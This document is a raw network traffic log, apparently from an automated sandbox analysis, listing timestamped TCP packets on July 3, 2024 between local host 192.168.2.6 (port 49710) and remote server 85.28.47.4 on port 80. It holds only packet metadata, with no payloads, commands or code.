Jul 3, 2024 18:08:37.321685076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321702003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321721077 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321893930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321903944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321914911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321926117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321940899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321957111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.322014093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.322025061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.322036028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.322048903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.322051048 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.322060108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.322069883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.322076082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.322103024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.323314905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323327065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323338032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323348999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323359013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323364973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.323369980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323381901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323385000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.323394060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323400021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.323405027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323416948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.323421001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323431969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323441982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323441982 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.323452950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323462963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323467016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.323473930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.323487997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.323498964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.323522091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326174021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326184988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326195955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326231003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326257944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326262951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326275110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326284885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326297045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326308012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326338053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326379061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326390982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326401949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326416969 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326442957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326494932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326507092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326541901 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326579094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326591015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326601028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326611996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326622963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326627016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326633930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326644897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326646090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326663017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326679945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326786041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326797009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326808929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326837063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326862097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326906919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326930046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326941013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326952934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326963902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326965094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.326977015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326987982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.326991081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.327007055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.327024937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.327172041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.327183008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.327193975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.327204943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.327218056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.327225924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.327229023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.327239990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.327250957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.327250957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.327266932 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.327294111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.328407049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.328465939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.403553009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.403568983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.403589010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.403599977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.403606892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.403616905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.403629065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.403747082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.403747082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.405467987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.405478954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.405488968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.405499935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.405524015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.405524015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.405536890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.405543089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.405561924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.405590057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409256935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409267902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409279108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409349918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409349918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409476042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409487009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409497976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409514904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409527063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409529924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409538031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409622908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409634113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409645081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409650087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409650087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409657001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409668922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409670115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409681082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409703970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409710884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409739017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409755945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409766912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409778118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409789085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409799099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409801960 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409811020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.409832954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.409852028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410020113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410031080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410041094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410063028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410089016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410110950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410120964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410130978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410141945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410152912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410156012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410175085 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410202980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410285950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410296917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410307884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410317898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410329103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410331011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410361052 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410406113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410418034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410429001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410464048 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410496950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410507917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410517931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410528898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410530090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410562992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410598993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410609007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410619974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410629988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410638094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410662889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410815954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410826921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410836935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410847902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410851002 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410859108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410870075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410877943 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410881042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410892010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.410907030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410927057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.410984993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411025047 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.411046028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411065102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411076069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411082983 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.411087036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411099911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.411113977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411117077 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.411143064 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.411211014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411222935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411233902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411243916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411246061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.411254883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411266088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411271095 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.411278009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.411299944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.411315918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.414783955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.414794922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.414844036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.414846897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.414855003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.414865971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.414874077 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.414902925 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.414953947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.414994001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415043116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415054083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415066004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415076017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415077925 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415096998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415122986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415293932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415304899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415316105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415327072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415344000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415374994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415400982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415411949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415424109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415447950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415463924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415467024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415477991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415488958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415499926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415518999 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415550947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415589094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415599108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415610075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415620089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415631056 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415653944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415684938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415695906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415707111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415715933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415718079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415745974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415879011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415889978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415899992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415910959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415916920 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415921926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415932894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415946007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415956020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.415961981 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.415990114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.416169882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.416179895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.416191101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.416201115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.416212082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.416217089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.416249037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.416511059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.416616917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.492261887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.492276907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.492288113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.492404938 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.494005919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.494016886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.494029999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.494083881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.494106054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.494457006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.494499922 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498020887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498039961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498051882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498063087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498064995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498075008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498085022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498086929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498125076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498150110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498167992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498184919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498195887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498207092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498246908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498276949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498287916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498300076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498310089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498317003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498347998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498774052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498785019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498796940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498825073 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498861074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498863935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498876095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498886108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498898029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498902082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498929977 CEST	49710	80	192.168.2.6	85.28.47.4
